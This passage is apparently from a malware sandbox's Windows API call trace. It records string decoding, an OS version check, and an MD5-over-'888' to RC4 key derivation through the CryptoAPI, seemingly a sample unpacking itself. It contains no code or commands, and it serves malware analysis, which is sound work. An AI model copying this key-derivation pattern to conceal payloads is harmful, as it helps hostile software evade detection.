lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.471] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0218.471] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0218.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.471] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.471] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.471] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0218.471] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.472] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0218.472] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.472] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.472] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.472] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.472] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.492] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.492] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0218.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0218.492] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.492] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.492] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0218.492] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.492] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0218.492] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0218.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0218.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0218.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0218.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0218.493] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0218.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.493] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0218.493] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.493] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0218.493] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.493] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.493] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.493] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.494] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.494] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.494] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.494] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.494] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.494] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.494] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.495] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.495] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.495] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.495] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.495] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.495] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.495] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.495] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.495] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.495] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.496] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.496] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabbf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0218.496] CryptCreateHash (in: hProv=0xa7bc48, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0218.496] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0218.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0218.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.497] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0218.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0218.497] CryptHashData (hHash=0x9e1cb8, pbData=0x2a71db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0218.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.497] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0218.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabbd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0218.498] CryptDeriveKey (in: hProv=0xa7bc48, Algid=0x6601, hBaseData=0x9e1cb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1bf8) returned 1 [0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 